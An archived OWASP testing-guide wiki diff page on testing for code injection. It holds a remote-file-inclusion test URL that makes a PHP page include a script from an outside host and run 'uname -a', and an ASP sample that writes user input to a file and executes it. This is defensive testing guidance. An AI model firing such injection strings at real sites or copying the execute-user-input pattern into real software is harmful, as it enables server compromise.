This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Testing for Code Injection (OTG-INPVAL-012)"
| Line 27: | Line 27: | ||
Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field? Here, the ASP code will save it to file and then execute it: | Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field? Here, the ASP code will save it to file and then execute it: | ||
| − | + | <% | |
| − | If not isEmpty(Request( "Data" ) ) Then | + | If not isEmpty(Request( "Data" ) ) Then |
| − | Dim fso, f | + | Dim fso, f |
| − | Set fso = CreateObject("Scripting.FileSystemObject") | + | 'User input Data is written to a file named data.txt |
| − | Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True) | + | Set fso = CreateObject("Scripting.FileSystemObject") |
| − | f.Write Request("Data") & vbCrLf | + | Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True) |
| − | f.close | + | f.Write Request("Data") & vbCrLf |
| − | Set f = nothing | + | f.close |
| − | Set fso = Nothing | + | Set f = nothing |
| + | Set fso = Nothing | ||
| − | Server.Execute( "data.txt" ) | + | 'Data.txt is executed |
| + | Server.Execute( "data.txt" ) | ||
| − | Else | + | Else |
| − | %> | + | %> |
| − | <form> | + | <form> |
| − | <input name="Data" /><input type="submit" name="Enter Data" /> | + | <input name="Data" /><input type="submit" name="Enter Data" /> |
| − | </form> | + | </form> |
| − | <% | + | <% |
| − | End If | + | End If |
| − | %>))) | + | %>))) |
Revision as of 03:35, 7 November 2006
Brief Summary
This section describes how an attacker can enter code as input on a web page and have it executed by the web server.
Description of the Issue
Code Injection attacks involve an attacker submitting code as input that is processed by the web server as dynamic code or as in an included file. These attacks can target various server side scripting engines, i.e. ASP, PHP, etc. Proper validation and secure coding practices need to be employed to protect against these attacks.
Black Box testing and example
Testing for PHP Injection vulnerabilities:
Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:
http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a
Result Expected:
The malicious url is accepted as a parameter for the PHP page, which will later use the value in an include file.
Gray Box testing and example
Testing for ASP Code Injection vulnerabilities
Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field? Here, the ASP code will save it to file and then execute it:
<%
If not isEmpty(Request( "Data" ) ) Then
Dim fso, f
'User input Data is written to a file named data.txt
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
f.Write Request("Data") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
'Data.txt is executed Server.Execute( "data.txt" )
Else %> <form> <input name="Data" /><input type="submit" name="Enter Data" /> </form> <% End If %>)))
References
Security Focus
Insecure.org
Wikipedia
